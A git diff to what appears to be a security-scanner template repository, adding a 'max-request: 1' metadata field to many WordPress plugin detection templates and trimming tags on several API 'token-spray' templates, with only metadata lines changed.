a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/token-spray/api-binaryedge.yaml b/http/token-spray/api-binaryedge.yaml index 28787494b0..1e58222327 100644 --- a/http/token-spray/api-binaryedge.yaml +++ b/http/token-spray/api-binaryedge.yaml @@ -9,7 +9,7 @@ info: reference: - https://binaryedge.io - https://docs.binaryedge.io - tags: dns,scan,recon,binaryedge,token-spray + tags: recon,binaryedge,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-c99.yaml b/http/token-spray/api-c99.yaml index 7681e766fc..8594dbe046 100644 --- a/http/token-spray/api-c99.yaml +++ b/http/token-spray/api-c99.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://api.c99.nl - tags: c99,api,dns,token-spray + tags: c99,api,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-chaos.yaml b/http/token-spray/api-chaos.yaml index ed3a9e9c63..9c32cefda3 100644 --- a/http/token-spray/api-chaos.yaml +++ b/http/token-spray/api-chaos.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://chaos.projectdiscovery.io/#/docs - tags: dns,recon,chaos,token-spray,projectdiscovery + tags: recon,chaos,token-spray,projectdiscovery metadata: max-request: 1 diff --git a/http/token-spray/api-fullhunt.yaml b/http/token-spray/api-fullhunt.yaml index 3452b354b5..adb6c3ae82 100644 --- a/http/token-spray/api-fullhunt.yaml +++ b/http/token-spray/api-fullhunt.yaml @@ -9,7 +9,7 @@ info: reference: - https://fullhunt.io - https://api-docs.fullhunt.io - tags: dns,scan,recon,fullhunt,database,token-spray + tags: scan,recon,fullhunt,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-intelx.yaml b/http/token-spray/api-intelx.yaml index 5fb69b3f95..8286a14a40 100644 --- a/http/token-spray/api-intelx.yaml +++ b/http/token-spray/api-intelx.yaml @@ -11,7 +11,7 @@ info: - https://github.com/IntelligenceX/SDK - https://github.com/IntelligenceX/SDK/blob/master/Intelligence%20X%20API.pdf - https://intelx.io/account?tab=developer - tags: dns,scan,recon,intelx,token-spray + tags: scan,recon,intelx,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-securitytrails.yaml b/http/token-spray/api-securitytrails.yaml index 4a507f5024..2963d10ea1 100644 --- a/http/token-spray/api-securitytrails.yaml +++ b/http/token-spray/api-securitytrails.yaml @@ -8,7 +8,7 @@ info: - https://securitytrails.com - https://docs.securitytrails.com - https://securitytrails.com/corp/api - tags: dns,ssl,recon,securitytrails,token-spray + tags: recon,securitytrails,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-shodan.yaml b/http/token-spray/api-shodan.yaml index c14ecb44cd..80eb89fdc9 100644 --- a/http/token-spray/api-shodan.yaml +++ b/http/token-spray/api-shodan.yaml @@ -10,7 +10,7 @@ info: - https://shodan.io - https://developer.shodan.io - https://developer.shodan.io/api - tags: dns,scan,recon,shodan,token-spray + tags: recon,shodan,token-spray metadata: max-request: 1 diff --git a/http/token-spray/api-sslmate.yaml b/http/token-spray/api-sslmate.yaml index f8f84b3217..15335e3646 100644 --- a/http/token-spray/api-sslmate.yaml +++ b/http/token-spray/api-sslmate.yaml @@ -8,7 +8,7 @@ info: - https://sslmate.com - https://sslmate.com/help/ - https://sslmate.com/help/reference/apiv2 - tags: dns,ssl,recon,sslmate,token-spray + tags: recon,sslmate,token-spray 